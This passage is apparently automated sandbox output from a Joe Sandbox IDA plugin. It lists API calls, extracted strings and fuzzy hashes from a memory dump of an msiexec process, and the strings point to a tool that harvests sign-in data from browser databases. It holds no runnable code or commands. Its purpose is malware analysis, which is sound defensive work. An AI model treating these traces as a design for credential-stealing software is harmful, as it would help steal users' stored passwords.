                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID: -journal$-wal
                                                                      • API String ID: 438689982-2894717839
                                                                      • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                      • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Item$Dialog$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3975816621-0
                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                      APIs
                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                      • API String ID: 1214746602-2708368587
                                                                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                      • memset.MSVCRT ref: 00405E33
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                      • String ID:
                                                                      • API String ID: 2313361498-0
                                                                      • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                      • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                      • String ID:
                                                                      • API String ID: 2047574939-0
                                                                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                      APIs
                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                      • String ID:
                                                                      • API String ID: 4218492932-0
                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                      APIs
                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID: gj
                                                                      • API String ID: 438689982-4203073231
                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                      APIs
                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                      • API String ID: 3510742995-2446657581
                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                      • memset.MSVCRT ref: 00405ABB
                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$FocusItemmemset
                                                                      • String ID:
                                                                      • API String ID: 4281309102-0
                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintfwcscat
                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                      • API String ID: 384018552-4153097237
                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$CountInfomemsetwcschr
                                                                      • String ID: 0$6
                                                                      • API String ID: 2029023288-3849865405
                                                                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                      APIs
                                                                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                      • memset.MSVCRT ref: 00405455
                                                                      • memset.MSVCRT ref: 0040546C
                                                                      • memset.MSVCRT ref: 00405483
                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$memcpy$ErrorLast
                                                                      • String ID: 6$\
                                                                      • API String ID: 404372293-1284684873
                                                                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesErrorFileLastSleep$free
                                                                      • String ID:
                                                                      • API String ID: 1470729244-0
                                                                      • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                      APIs
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                      • wcscpy.MSVCRT ref: 0040A0D9
                                                                      • wcscat.MSVCRT ref: 0040A0E6
                                                                      • wcscat.MSVCRT ref: 0040A0F5
                                                                      • wcscpy.MSVCRT ref: 0040A107
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                      • String ID:
                                                                      • API String ID: 1331804452-0
                                                                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                      APIs
                                                                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                      • String ID: advapi32.dll
                                                                      • API String ID: 2012295524-4050573280
                                                                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                      APIs
                                                                      Strings
                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                      • <%s>, xrefs: 004100A6
                                                                      • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_snwprintf
                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                      • API String ID: 3473751417-2880344631
                                                                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscat$_snwprintfmemset
                                                                      • String ID: %2.2X
                                                                      • API String ID: 2521778956-791839006
                                                                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintfwcscpy
                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                      • API String ID: 999028693-502967061
                                                                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                      APIs
                                                                      • strlen.MSVCRT ref: 00408DFA
                                                                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                      • memset.MSVCRT ref: 00408E46
                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memsetstrlen
                                                                      • String ID:
                                                                      • API String ID: 2350177629-0
                                                                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                      • API String ID: 2221118986-1606337402
                                                                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                      APIs
                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                      • memset.MSVCRT ref: 00408FD4
                                                                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                      • memset.MSVCRT ref: 00409042
                                                                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                      • String ID:
                                                                      • API String ID: 265355444-0
                                                                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004116FF
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
